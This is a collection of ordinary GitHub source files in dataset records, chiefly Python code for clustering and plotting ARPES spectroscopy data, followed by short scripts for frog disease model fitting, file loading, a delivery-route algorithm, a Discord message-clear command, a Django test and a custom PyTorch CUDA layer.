{cluster}', fontsize=20)\n fig.subplots_adjust(top=1.1)\n\n grid = ImageGrid(fig, 111, \n nrows_ncols=(5, 2), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes\n )\n \n for p in range(len(grid)//2):\n values = cv2.resize(self.ARPES.data[points[p][0], points[p][1]], (256,256))\n arped = ARPES_data.get_decoding(values, enhance)\n grid[2*p].imshow(arped, cmap = 'magma')\n if line:\n fermi = get_fermi(arped, epsilon)\n grid[2*p].axhline(y=fermi, color='red', alpha=0.5, linewidth=2)\n grid[2*p].axhline(y=fermi+43, color='green', alpha=0.3, linewidth=10)\n grid[2*p+1].imshow(values, cmap = 'magma')\n grid[2*p+1].grid(False)\n grid[2*p+1].axis('off')\n grid[2*p].grid(False)\n grid[2*p].axis('off')\n fig.tight_layout()\n fig.subplots_adjust(top=0.92)\n plt.show()\n plt.clf()\n\n def show_cluster(self, cluster, encode = False, enhance = False):\n print(f\"Getting cluster {cluster}...\")\n if cluster > len(self.centers)-1:\n print(\"Cluster is out of range.\")\n return None\n points = []\n for n in range(len(self.labels)):\n if self.labels[n] == cluster:\n points.append([n%self.ARPES.x_s, n//self.ARPES.x_s])\n \n points = random.sample(points, 15)\n fig = plt.figure(figsize=(6, 10))\n fig.suptitle(f'Cluster {cluster}', fontsize=12)\n fig.subplots_adjust(top=0.8)\n\n grid = ImageGrid(fig, 111, \n nrows_ncols=(5, 3), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes\n )\n \n for p in range(len(grid)):\n if p < len(points):\n values = cv2.resize(self.ARPES.data[points[p][0], points[p][1]], (256,256))\n if encode:\n grid[p].imshow(ARPES_data.get_decoding(values, enhance), cmap = 'magma')\n else: \n grid[p].imshow(values, cmap = 'magma')\n\n grid[p].grid(False)\n grid[p].axis('off')\n\n fig.tight_layout()\n plt.show()\n plt.clf()\n\n\n\n def show_distribution(self, cmap='YlOrRd'):\n scatter_x, scatter_y = self.cords[:,:2].T\n percents = self.percents\n group = self.labels\n\n clr_range = np.linspace(0, 1, group.max()+1)\n\n fig, ax = plt.subplots()\n for g in np.unique(group):\n ix = np.where(group == g)\n ax.scatter(scatter_x[ix], scatter_y[ix], c = cm.get_cmap(cmap)(clr_range[g]),\\\n edgecolors='black', label = f'Cluster {g}', s = 100)\n ax.legend(frameon=True)\n print(f\"Accounting for {sum(percents[:2])} of varience.\")\n plt.xlabel(\"Principal Component 1\")\n plt.ylabel(\"Principal Component 2\") \n plt.show()\n\n \n\n def show_3d(self, cmap='YlOrRd', show_cent=False):\n scatter_x, scatter_y, scatter_z = self.cords[:,:3].T\n percents = self.percents\n group = self.labels\n\n clr_range = np.linspace(0, 1, group.max()+1)\n\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(projection='3d')\n\n\n for g in np.unique(group):\n ix = np.where(group == g)\n ax.scatter(scatter_x[ix], scatter_y[ix], scatter_z[ix], c = cm.get_cmap(cmap)(clr_range[g]),\\\n edgecolors='black', label = f'Cluster {g}', s = 100)\n \n ax.legend(frameon=True)\n ax.set_xlabel(\"Principal Component 1\", labelpad = 10.)\n ax.set_ylabel(\"Principal Component 2\", labelpad = 10.)\n ax.set_zlabel(\"Principal Component 3\", labelpad = 10.)\n\n\n if show_cent:\n ax2 = fig.add_subplot(111,frame_on=False) \n ax2.axis(\"off\")\n ax2.axis([0,1,0,1])\n\n # below solution from ImportanceOfBeingErnest on Github\n def proj(X, ax1, ax2):\n x,y,z = X\n x2, y2, _ = proj3d.proj_transform(x,y,z, ax1.get_proj())\n return ax2.transData.inverted().transform(ax1.transData.transform((x2, y2)))\n \n def image(ax,arr,xy):\n \"\"\" Place an image (arr) as annotation at position xy \"\"\"\n im = offsetbox.OffsetImage(arr, 
zoom=0.6)\n im.image.axes = ax\n ab = offsetbox.AnnotationBbox(im, xy, xybox=(0., -80.),\n xycoords='data', boxcoords=\"offset points\",\n pad=0.3, arrowprops=dict(arrowstyle='-|>', color='black'))\n ax.add_artist(ab)\n\n norm = lambda x : x/x.max()\n\n closest, _ = pairwise_distances_argmin_min(self.centers, self.cords)\n points = [(i%self.ARPES.x_s, i//self.ARPES.x_s) for i in closest]\n images = np.array([cv2.resize(self.ARPES.data[p[0], p[1]], (64,64)) for p in points])\n values = [cm.magma(norm(i)) for i in images] # all the images\n\n xs, ys, zs = np.array([self.cords[:, :3][c] for c in closest]).T\n\n\n for s in zip(xs,ys,zs, values):\n x,y = proj(s[:3], ax, ax2)\n image(ax2,s[3],[x,y])\n\n print(f\"Accounting for {sum(percents[:3])} of varience.\")\n plt.show()\n\n\n def get_accuracy(self, gt):\n assert len(gt.shape) == 2\n vals = []\n tests = list(permutations(range(int(gt.max())+1)))\n print(tests)\n labelswitch = np.zeros(gt.shape)\n x, y = gt.shape\n for label in tests:\n for i in range(x):\n for j in range(y):\n labelswitch[i,j] = label[int(np.reshape(self.labels, (30, 30), order = 'F')[i,j])]\n vals.append(np.count_nonzero(gt-labelswitch))\n return round(1-min(vals)/(x*y), 3)\n\n\n\n def PCA_on_autoencoder(self, bad_label = 0):\n pca_model = PCA(0.95)\n pca_model2 = PCA(0.95)\n cleaned_cords = []\n raw_cords = []\n for cord in range(len(self.labels)):\n if self.labels[cord] != bad_label:\n cleaned_cords.append(self.cords[cord])\n raw_cords.append(1)\n else:\n raw_cords.append(0)\n cc = np.array(cleaned_cords)\n t = ((pca_model2.fit_transform(cc)).T[0]).T\n final = []\n counter = 0\n for i in range(len(raw_cords)):\n if raw_cords[i] == 0:\n final.append(0)\n else:\n final.append(t[counter])\n counter += 1\n return np.array(final)\n \n def zerocount(self, bad_label, epsilon = 0.5):\n x_s = self.ARPES.x_s\n y_s = self.ARPES.y_s\n map = np.zeros((x_s,y_s))\n lab = np.reshape(self.labels, (x_s, y_s))\n for x in range(x_s):\n for y in range(y_s):\n if lab[x,y] != bad_label:\n map[x,y] = get_fermi(ARPES_data.get_decoding(self.ARPES.data[y,x], True), epsilon)\n else:\n map[x,y] = 0\n return map\n\n\n# create custom class for ARPES data\nclass ARPES_data:\n def __init__(self, data, xmin, xmax, ymin, ymax, KE_min, KE_max, \\\n Theta_min, Theta_max):\n self.data = data\n self.x_s, self.y_s, self.Ke_s, self.Ang_s = data.shape # also loads shape initially\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n self.KE_min = KE_min\n self.KE_max = KE_max\n self.Theta_min = Theta_min\n self.Theta_max = Theta_max\n\n\n # enables the grabbing of data values by subscripting\n def __getitem__(self, key): \n return self.data[key]\n\n\n # makes default representation the raw data in matrix form\n def __repr__(self): \n return self.data\n\n\n # plot the data using this wrapper function (notes: everything follows ply, Autosqure automatically scales the thing)\n # specifaiclly used for matricies\n @staticmethod \n def plot_graph(values, xlabel, ylabel, ext, xbins=6, ybins=6, \\\n interpolation = \"lanczos\", aspect=1, cmap = \"magma\",\\\n title = \"\", pad = 0, Autosquare = False, cbar = True, show = True,\n axis = True): \n fig = plt.figure(figsize=(6, 6))\n print(\"Drawing graph...\")\n if Autosquare: # automatically make thing square\n aspect = (ext[1]-ext[0])/(ext[3]-ext[2])\n \n fig, ax = plt.subplots()\n plt.imshow(values, extent = ext, interpolation = interpolation, \\\n aspect=aspect, cmap = cmap)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel) \n plt.title(title, pad=pad) 
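# pad offsets the title from the top of the axes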
\n plt.grid(False)\n if not axis:\n plt.axis('off')\n if cbar:\n plt.colorbar()\n else: # create custom legend\n elements = []\n n_clusters = np.amax(values)+1\n clr_range = np.linspace(0, 1, n_clusters)\n for cluster in range(n_clusters):\n elements.append(Patch(label = f\"Cluster {cluster}\", facecolor = cm.get_cmap(cmap)(clr_range[cluster])))\n ax.legend(handles = elements, loc = 'lower right', bbox_to_anchor=(1.3, 0.4), frameon=True)\n if show:\n plt.show()\n plt.clf()\n\n # transform raw data to processable cv2 img (1-d array form when flattened)\n def clust_transform(self, img, dim =(256,256)):\n img = cv2.resize(img, dim) # create greyscale cv2 img\n img = np.reshape(img, (1,-1))[0] # create 1xn array\n return img\n\n # creates graph of the object integrated over all angles and energies\n def show(self, Interpolation=\"none\"): \n t_0 = time.time()\n print(\"Formating data for graph...\") # sum over all angles and values\n self.plot_graph(sum_all(self.x_s, self.y_s, self.data), 'X (mm)', 'Y (mm)', [self.xmin, self.xmax, self.ymin, self.ymax], interpolation = Interpolation)\n\n @staticmethod\n def get_encoding(img, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n encoder = keras.Model(input_img, encoded)\n val = np.array([norm_ln(img)]) if enhance else np.array([norm(img)])\n return np.reshape(encoder.predict(val), (64,32))\n\n @staticmethod\n def get_batch(imgs, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n encoder = keras.Model(input_img, encoded)\n val = norm_ln_batch(imgs) if enhance else norm_batch(imgs)\n val = np.array([np.reshape(n, (256,256, 1)) for n in val])\n return encoder.predict_on_batch(val)\n\n\n @staticmethod\n def get_decoding(img, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n val = np.array([norm_ln(img)]) if enhance else np.array([norm(img)])\n return np.reshape(autoencoder.predict(val), (256,256))\n\n\n # shows deep-learning embedding\n def show_encoding(self, l_x, l_y):\n print(f\"Formating encoding for point ({l_x},{l_y})...\")\n graph = cv2.resize(self.get_encoding(self.data[l_x,l_y]), (256,256))\n self.plot_graph(graph,'', '', \\\n [0, 1, 0, 1], aspect = 1, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, axis = False,\n cmap = 'gray', interpolation = \"none\")\n\n def show_decoding(self, l_x, l_y, enhance = False):\n print(f\"Formating decoding for point ({l_x},{l_y})...\")\n decode = self.get_decoding(self.data[l_x,l_y], enhance = True)\n graph = cv2.resize(decode, (256,256))*255\n self.plot_graph(graph,'', '', \\\n [0, 1, 0, 1], aspect = 1, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, axis = False,\n cmap = 'gray', interpolation = \"none\")\n\n # plots angle-KE data at specific l_x l_y cord\n def show_point(self, l_x, l_y, mode = 'default'): \n print(f\"Formating data for point ({l_x},{l_y})...\")\n graph = self.data[l_x, l_y] # look at the l_x, l_y point of the data\n\n if mode=='ln': # ln compression if needed\n vlog = lambda i : log(i+1)\n mat_log = np.vectorize(vlog)\n graph = mat_log(graph)\n elif mode=='sqrt': # quadretic compression if needed\n vlog = lambda i : sqrt(i)\n mat_log = np.vectorize(vlog)\n graph = mat_log(graph)\n elif mode!='default': # check cases\n print('Mode must be \"default\", \"ln\", or \"sqrt\". 
Leave blank for default.')\n return None\n \n self.plot_graph(graph,'Theta (deg)', 'KE (eV)', \\\n [self.Theta_min, self.Theta_max, self.KE_min, self.KE_max], aspect = 40, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, Autosquare = True)\n\n\n # integrate along energy (returns angle-point-intensity graph)\n def integrate_energy(self): \n print(\"Integrating energy...\")\n graph = np.zeros((self.x_s*self.y_s, self.Ang_s))\n for x in range(self.x_s):\n for y in range(self.y_s):\n graph[self.x_s*y+x] = self.data[x,y].sum(0) # replace each row with compressed data row\n return graph\n\n\n # integrate along angle (returns energy-point-intensity graph)\n def integrate_angle(self): \n print(\"Integrating angle...\")\n graph = np.zeros((self.x_s*self.y_s, self.Ke_s))\n for x in range(self.x_s):\n for y in range(self.y_s):\n graph[self.x_s*y+x] = self.data[x,y].sum(1) # replace each row with compressed data row\n return graph\n\n # autoencoder over surface \n def autoencode(self, enhance=False):\n print(\"Autoencoding data...\")\n flat = np.concatenate(np.swapaxes(self.data, 0, 1))\n graph = np.reshape(self.get_batch(flat, enhance=enhance), (self.x_s * self.y_s, 2048))\n return graph\n\n # graph the energy data in terms of the indivisual points\n def show_energy(self): \n print(\"Formatting data for energy...\")\n graph = self.integrate_energy()\n self.plot_graph(graph, \"Angle (deg)\", \"Point\", \\\n ext = [self.Theta_min, self.Theta_max, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation = \"none\")\n\n\n # graph the angle data in terms of the indiviusal points\n def show_angle(self): \n print(\"Formatting data for angle...\")\n graph = self.integrate_angle()\n self.plot_graph(graph, \"KE (eV)\", \"Point\", \\\n ext = [self.KE_min, self.KE_max, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation= \"none\")\n \n # graph autoencoder distributions\n def show_autoencode(self, enhance=False):\n print(\"Formatting data for autoencoding...\")\n graph = self.autoencode(enhance)\n self.plot_graph(graph, \"\", \"Point\", \\\n ext = [0, 2048, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation= \"none\", axis = False)\n\n\n # perform PCA dimentionality reduction\n def PCA(self, dim = (256,256), n_components = 0.95):\n t_i = time.time()\n print(\"Beginning PCA...\")\n model = PCA(n_components)\n values = np.zeros((self.x_s*self.y_s, dim[0]*dim[1]))\n for x in range(self.x_s):\n for y in range(self.y_s):\n values[x+y*self.x_s] = self.clust_transform(self.data[x,y], dim = dim)\n model.fit(values)\n print(f\"PCA reduction complete, took {round(time.time()-t_i, 2)} seconds.\")\n return model.transform(values), model.explained_variance_ratio_\n\n\n # kmeans\n def kmeans(self, dtype, n_clusters, dim = (256,256), n_components = 0.95, enhance = False): \n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', 'PCA', or 'autoencoder'.\")\n return None\n \n km = KMeans(n_clusters, n_init = 10, random_state = 100) # create kmeans\n \n if dtype == 'PCA':\n target, percents = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n percents = None\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n percents = None\n\n print(f\"Beginning kmeans clustering, type is {dtype}...\")\n t_i = time.time()\n vals = km.fit(target)\n print(f\"Kmeans clustering complete, took {round(time.time()-t_i, 2)} seconds.\")\n return Clustered(self, vals, target, dtype, percents)\n\n\n # 
knn-based smoothing\n def knn(self, results, sampling, n_neighbors): \n print(\"Begninning knn smoothing...\")\n t_i = time.time()\n c_product = lambda x,y : np.transpose([np.tile(x, len(y)), np.repeat(y, len(x))]) # cartesion product lambda function\n x_range, y_range = np.linspace(self.xmin, self.xmax, self.x_s), np.linspace(self.ymin, self.ymax, self.y_s)\n dataspace = c_product(x_range, y_range) # create grid of all known values\n clf = KNeighborsClassifier(n_neighbors, weights='distance')\n clf.fit(dataspace, results) # fit KNN model: first term is location, second term is type\n xx, yy = np.meshgrid(np.linspace(self.xmin, self.xmax, sampling),\\\n np.linspace(self.ymin, self.ymax, sampling))\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()]) # start sampling the created space using the KNN alg\n Z = Z.reshape(xx.shape)\n print(f\"Knn smoothing complete, took {round(time.time()-t_i,2)} seconds.\")\n return Z.T\n\n\n # wrapper to print object\n def show_kmeans(self, dtype, n_clusters, smooth=False, sampling=2000, n_neighbors = 5, Autosquare = True, enhance = False):\n results = self.kmeans(dtype, n_clusters, enhance = enhance).labels\n if smooth:\n graph = self.knn(results, sampling, n_neighbors) # extrapolate in-between values using knn alg. above\n else:\n graph = np.reshape(results, (self.x_s, self.y_s), order='F') # return linearly ordered data to 2-d graph\n \n self.plot_graph(graph,'X (mm)', 'Y (mm)', \\\n [self.xmin, self.xmax, self.ymin, self.ymax], interpolation= \"none\", \\\n cmap = 'YlOrRd', title = f'K-means clustering for {dtype}', \\\n pad = 15, cbar = False, Autosquare = Autosquare)\n\n # visialiezer for the elbow method via yellowbrick\n def elbow(self,dtype,range=(3,8), dim=(256,256), n_components=0.95, enhance=False): \n print(f\"Visualising elbow method for '{dtype}'...\")\n model = KMeans()\n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', 'autoencoder', or 'PCA'\")\n return None\n\n if dtype == 'PCA':\n target, _ = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n visualizer = KElbowVisualizer(model, k=range)\n visualizer.fit(target)\n visualizer.show() \n\n\n def silhouette(self,dtype,range=(3,8), dim=(256,256), n_components=0.95, enhance = False): \n print(f\"Visualising elbow method for '{dtype}'...\")\n model = KMeans()\n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', or 'PCA'\")\n return None\n\n if dtype == 'PCA':\n target, _ = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n visualizer = SilhouetteVisualizer(model, colors='yellowbrick')\n visualizer.fit(target)\n visualizer.show() \n","repo_name":"therealericsun/deeparpes","sub_path":"main/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":23211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9471771759","text":"import os\nimport pandas as pd\nimport reduced_model as comm\nimport numpy as np\nimport scipy.stats as stats\nimport reduced_mcmc as red_mcmc\n\n\"\"\"\nRun goodness of fit tests for best fit models on observed Bd prevalence and\nintensity.\n\n\"\"\"\n# Set up file paths\nhome_path = os.path.expanduser(\"~\")\ndata_dir = 
os.path.join(\"..\", \"data\")\nbase_temp_path = os.path.join(data_dir,\n \"temperature_data\",\n \"historical_temperature_data\")\ntemperature_path = os.path.join(data_dir,\n \"temperature_data\",\n \"measured_temperature_data\")\n\nif __name__ == '__main__':\n\n # Set preliminary parameters\n\n # Site by species dict\n spp_dict = {'PA': 'LIPI', 'VT': 'LIPI', 'LA': \"LISP\", 'TN': 'LISP'}\n\n # Best fit models for each location\n models = {'PA': 'a_temp', 'VT': 'a_temp',\n 'TN': 'a_temp', 'LA': 'both_model'}\n load_dependent_loss = True # All best models have load-dependent loss\n\n rsq_ests = {}\n percent_pvals = {}\n for dod_location in ['VT', 'PA', \"TN\", 'LA']:\n\n # Extract model fits\n res = pd.read_pickle(\"../results/pickled_results/{0}_{2}_{1}_allsites_ext_beta_prior_K=8_loss_load_omega=1.pkl\".format(dod_location, spp_dict[dod_location], models[dod_location]))\n spps = res['species']\n site_numbers = res['sites']\n adapt = res['adapt_param']\n est_params = res['parameters']\n chains = res['chains']\n mcmc_res = res['mcmc_results']\n base_params = res['base_params']\n\n # Set simulation parameters\n model_params = {'time_step': 7, 'mean_temp': 15}\n initial_densities = {spp: np.array([0, 1.0, 1.0, 1.0]) for spp in spps}\n comm_site_params = [{} for i in range(len(site_numbers))]\n site_areas = [1.0 for site in site_numbers]\n start_date = pd.datetime(2016, 1, 1)\n steps = 201\n\n # Set up data for simulation and goodness of fit\n datapath = os.path.join(data_dir, \"leopard_frog_data.csv\")\n fulldat = red_mcmc.load_and_format_data(datapath, exclude=None)\n dod_dat = fulldat[(fulldat.DOD_location == dod_location) &\n (fulldat.Site_code.isin(site_numbers))]\n obs_dat = dod_dat[['Site_code', 'Species_code', 'Date', 'Bd_pos', 'Bd_load']]\n sppsite_dats = [{spp: (obs_dat.query(\"Site_code == {0} and Species_code == '{1}'\".format(sitenum, spp))\n .assign(date=lambda x: pd.to_datetime(x.Date))\n .sort_values(by=['date'])\n .reset_index(drop=True)) for spp in spps}\n for sitenum in site_numbers]\n\n # Extract temperature data\n temp_data, base_dat, longterm = red_mcmc.get_temp_data(dod_location,\n average_sites=False)\n\n # 1. Get median parameter estimates\n est_spp_params = {}\n sims = 1\n for spp in spps:\n\n ndarray = np.array([mcmc_res[i]['params'][spp][:, 5*adapt:].T for i in range(chains)])\n num_samp = ndarray.shape[1]\n samp_params = []\n\n # Extract median parameters for prediction\n for num in range(sims):\n\n mean_params = np.median(ndarray, axis=(0, 1))\n samp_params.append({ep: mean_params[i]\n for i, ep in enumerate(est_params)})\n\n est_spp_params[spp] = samp_params\n\n # 2. Simulate the model\n z_fxn = comm.zsurv_fxn(model_params['time_step'])\n sim_res_site = []\n for s, site in enumerate(site_numbers):\n\n # Get temperature functions\n temp_fxns = red_mcmc.build_temperature_fxn(temp_data, base_dat, longterm, site,\n start_date)\n temp_fxn, temp_fxn_cv, temp_fxn_mm = temp_fxns\n\n all_sim_res = []\n for sim_num in range(sims):\n\n params = {}\n for spp in spps:\n\n tparams = base_params[spp].copy()\n tparams.update(est_spp_params[spp][sim_num])\n params[spp] = tparams\n\n sim_res = red_mcmc.run_model(params, z_fxn, temp_fxn, temp_fxn_cv,\n temp_fxn_mm, initial_densities, model_params,\n steps, site_areas[s], comm_site_params[s],\n load_dependent_loss, start_date)\n all_sim_res.append(sim_res)\n\n sim_res_site.append(all_sim_res)\n\n # 3. 
Compute goodness of fit\n        gof_dt = []\n        for s in range(len(site_numbers)):\n            for j in range(sims):\n\n                odat = sppsite_dats[s][spps[0]]\n                simdat = sim_res_site[s][j][spps[0]]\n                data = pd.merge_asof(odat, simdat, direction=\"nearest\", on='date')\n                gof_dt.append(data)\n\n        gof_dt = pd.concat(gof_dt)\n\n        # Compute R2 using formula from Gelman et al. 2017\n        ind = gof_dt.Bd_load > 0\n        rsq_dt = gof_dt[ind]\n        obs = np.log(rsq_dt.Bd_load.values)\n        pred = rsq_dt.mean_load.values\n        v_pred = np.var(pred)\n        v_resid = np.var((obs - pred))\n        rsq_alt = (v_pred) / (v_pred + v_resid)\n\n        # R2 results\n        rsq_ests[dod_location] = rsq_alt\n\n        # Calculate the number of instances where the observed prevalence\n        # is significantly different than predicted prevalence at alpha = 0.05\n        # corrected for multiple comparisons.\n        gof_dt = gof_dt.assign(month=lambda x: x.date.dt.month,\n                               year=lambda x: x.date.dt.year)\n\n        def my_group(x):\n\n            names = {'pred_prev': x.prev.mean(),\n                     'n': len(x),\n                     'inf': np.sum(x.Bd_pos == 1)}\n            return(pd.Series(names, index=['pred_prev', 'n', 'inf']))\n\n        df = gof_dt.groupby(['Site_code', 'date']).apply(my_group).reset_index()\n\n        # Get p-values from binomial test\n        pvals = np.array([stats.binom_test(df.inf.values[i],\n                                           n=df.n.values[i],\n                                           p=df.pred_prev.values[i])\n                          for i in range(df.shape[0])])\n\n        # Only compare values with 5 or more samples so we have some power to detect\n        # differences\n        pvals = pvals[df.n.values >= 5]\n\n        # Use Bonferroni correction\n        alpha = 0.05 # Type I error rate\n        percent_sig = np.sum(pvals < (alpha / len(pvals))) / len(pvals)\n\n        # Prevalence results\n        percent_pvals[dod_location] = (percent_sig, len(pvals))\n\n\n","repo_name":"mqwilber/bd_seasonality","sub_path":"code/goodness_of_fit.py","file_name":"goodness_of_fit.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28235124132","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/6/12-11:39\n# @Author : 灯下客\n# @Email : \n# @File : file_loader.py\n# @Software: PyCharm\nimport os\n\nfiles_cached = {}\n\n\nclass FileLoader(object):\n    default_file = None\n    file_env_location = None\n    path = None\n\n    def __init__(self, path, default_filename):\n        self.path = path\n        self.default_file = default_filename\n\n    def get_file(self, path=None, fn=None):\n        if path is None:\n            path = self.path\n        if os.path.isdir(path):\n            path = os.path.join(path, self.default_file)\n        return self._get_conf_from_file(path, fn)\n\n    def put_file(self, path, content, mode=\"w\"):\n        file_to_write = open(path, mode)\n        file_to_write.write(content) # The key is type bytes still\n        file_to_write.close()\n\n    def _get_conf_from_file(self, path, fn=None):\n        if path and os.path.isdir(path):\n            path = os.path.join(path, self.default_file)\n\n        if not path or not os.path.isfile(path):\n            return {}\n        if path not in files_cached:\n            self.path = path\n            if fn:\n                files_cached[path] = fn(path)\n            else:\n                file_to_read = open(path, \"rb\")\n                content = file_to_read.read() # The key will be type bytes\n                file_to_read.close()\n                files_cached[path] = content\n        return files_cached[path]\n","repo_name":"cookieGeGe/py_easy_config","sub_path":"easy_config_py/file_loader.py","file_name":"file_loader.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968837635","text":"# https://chaemi720.tistory.com/153\n\ndef solution(N, road, K):\n    # organize the travel times between villages into a 2D matrix\n    path = [[0]*(N+1) for _ 
in range(N+1)]\n    for r in road:\n        # If there is no road yet, add it\n        if path[r[0]][r[1]] == 0:\n            path[r[0]][r[1]] = r[2]\n            path[r[1]][r[0]] = r[2]\n        # If a road already exists, keep the one with the smaller travel time\n        else:\n            path[r[0]][r[1]] = min(path[r[0]][r[1]],r[2])\n            path[r[1]][r[0]] = path[r[0]][r[1]]\n\n    # Travel times\n    time = [0]*(N+1)\n    # Village 1 is always reachable, so mark it with 10\n    time[1] = 10\n    q = [1]\n    while q:\n        now = q.pop(0)\n        for idx,i in enumerate(path[now]):\n            # If a road exists and delivery is possible within K hours (village 1 starts at 10, so compare against K+10 instead of K)\n            if i and time[now] + i <= K+10:\n                # If this village was reached before, compare the previous time with the current one -> keep the smaller\n                if time[idx]:\n                    if time[now]+i < time[idx]:\n                        time[idx] = time[now] + i\n                        q.append(idx)\n                # If it was never reached before\n                else:\n                    time[idx] = time[now] + i\n                    q.append(idx) \n    # Count the villages with a recorded arrival time (a time of 0 means the village could not be reached)\n    return N+1-time.count(0)","repo_name":"chaemj97/Algorithm","sub_path":"2022년/6월/0608_pro_배달.py","file_name":"0608_pro_배달.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42270180485","text":"from discord.commands import slash_command, Option\nfrom discord.ext import commands\nfrom sdb_lib import Config, Messages, success_embed, error_embed\n\n\nclass Clear(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n    @slash_command(\n        name = \"clear\",\n        description = \"Clears a number of messages\",\n        guild_ids = Config.guild_ids\n    )\n    @commands.has_permissions(manage_messages = True)\n    @commands.bot_has_permissions(manage_messages = True)\n    async def clear(\n        self, ctx,\n        amount: Option(int, \"messages\", min_value = 1)\n    ):\n        if amount <= 0:\n            return await ctx.respond(embed = error_embed(Messages.clear_invalid_argument.replace(\"{}\", str(amount))), ephemeral = True)\n\n        try:\n            await ctx.channel.purge(limit = amount)\n            await ctx.respond(embed = success_embed(Messages.clear_success.replace(\"{}\", str(amount))), ephemeral = True)\n        except Exception:\n            await ctx.respond(embed = error_embed(Messages.clear_fail))\n\n    @clear.error\n    async def clear_error(self, ctx, error):\n        if isinstance(error, commands.MissingPermissions):\n            await ctx.respond(embed = error_embed(Messages.missing_permissions.replace(\"{}\", \"`MANAGE_MESSAGES`\")), ephemeral = True)\n\n        elif isinstance(error, commands.BotMissingPermissions):\n            await ctx.respond(embed = error_embed(Messages.bot_missing_permissions.replace(\"{}\", \"`MANAGE_MESSAGES`\")), ephemeral = True)\n\n\ndef setup(bot):\n    bot.add_cog(Clear(bot))\n","repo_name":"Voided-Git/simple-discord-bot","sub_path":"exts/moderation/clear.py","file_name":"clear.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22959165446","text":"from django.test import TestCase, Client\n\nfrom django.urls import reverse, resolve\n\nfrom users.views import register\n\nclass TestViews(TestCase):\n\n    def setUp(self):\n        self.client = Client()\n\n    def test_get_register(self):\n        \"\"\" Testing get register function \"\"\"\n        response = self.client.get(reverse('users-register'))\n\n        self.assertEqual(response.status_code, 200)\n\n        self.assertTemplateUsed(response, 'users/register.html')\n","repo_name":"ahmedmunir/django-blog","sub_path":"users/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5550486125","text":"import torch\nfrom torch.utils.cpp_extension import load\n\ntest_kernel = 
load(name=\"test_kernel\", sources=[\"src/mathutil_cuda.cpp\", \"src/mathutil_cuda_kernel.cu\"])\n\nclass CudaLinear(torch.nn.Linear):\n    def forward(self, x):\n        # y will be (*, out_features)\n        x_flat = x.view(-1, x.shape[-1])\n        y_shape = (*x.shape[:-1], self.out_features)\n        y = torch.zeros(y_shape, device='cuda')\n        test_kernel.linear(x_flat, self.weight, self.bias, y)\n        return y","repo_name":"epitaque/pytorch-custom-kernel","sub_path":"custom_kernel_modules.py","file_name":"custom_kernel_modules.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5731802708","text":"# Create the file and, if it already exists, read its contents\ndef crear_archivo():\n\n    already_exists = False  # tracks whether the file already existed\n\n    try:\n\n        file = open('informacion.dat', 'x')  # create and open the file\n        file.close()  # Close the file\n    except FileExistsError:\n\n        already_exists = True\n        print('The file already exists, it was created previously')\n\n    except Exception as e:\n\n        print(f'Error: {e}')\n\n    if already_exists:\n\n        try:\n\n            with open('informacion.dat', 'r') as file:\n\n                datos = file.readlines()\n\n                for linea in datos:\n\n                    print(linea)\n\n        except Exception as e:\n\n            print(e)\n\n\ncrear_archivo()\n","repo_name":"IsauraCG/python_avanzado","sub_path":"M4_S8_Rebound_Gestion de Archivos/otro_rebound.py","file_name":"otro_rebound.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13109119733","text":"# -*- coding: utf-8 -*-\n# Date: 2020/3/17 12:14\n\n\"\"\"\na tool module for managing model checkpoints, tensorboard, and experiment records\nThe key idea is to handle the directory structure: we only consider which files need to be saved, and then\neach file is saved in the appropriate location.\n\"\"\"\nimport subprocess\n\nfrom torchfurnace.utils.function import log\n\n__author__ = 